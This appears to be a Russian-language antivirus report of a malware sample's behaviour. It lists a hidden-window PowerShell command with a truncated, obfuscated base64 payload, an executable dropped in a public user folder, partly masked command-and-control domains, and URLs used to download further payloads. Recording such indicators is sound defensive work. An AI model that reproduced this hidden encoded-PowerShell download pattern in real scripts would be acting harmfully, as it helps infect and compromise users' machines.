Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAoACAAJABlAG4AdgA6AEMAbwBtAHMAcABlAEMAWwA0ACwAMgA0ACwAMgA1AF0ALQBqAE8ASQBuACcAJwApACAAKAAoACcAbgA1AFYAbgBzAGEAJwArACcAZABhAHMAZAAgACcAKwAnAD0AIAAmACcAKwAnACgAbgA0AGgAbg...
- C:\users\public\171109.exe
- C:\users\public\171109.exe
- 'si##man.com':80
- 'ko###aier.de':80
- 'we##inq.net':80
- 'we##inq.net':443
- 'xl#s.de':80
- http://si##man.com/d9ccfsk/
- http://ko###aier.de/Q8IZvY/
- http://we##inq.net/ZYzOTsADBr/
- http://xl#s.de/UsnQDDJJy/
- 'we##inq.net':443
- DNS ASK si##man.com
- DNS ASK ko###aier.de
- DNS ASK ic##b8.hk
- DNS ASK we##inq.net
- DNS ASK xl#s.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAoACAAJABlAG4AdgA6AEMAbwBtAHMAcABlAEMAWwA0ACwAMgA0ACwAMgA1AF0ALQBqAE8ASQBuACcAJwApACAAKAAoACcAbgA1AFYAbgBzAGEAJwArACcAZABhAHMAZAAgACcAKwAnAD0AIAAmACcAKwAnACgAbgA0AGgAbg...' (со скрытым окном)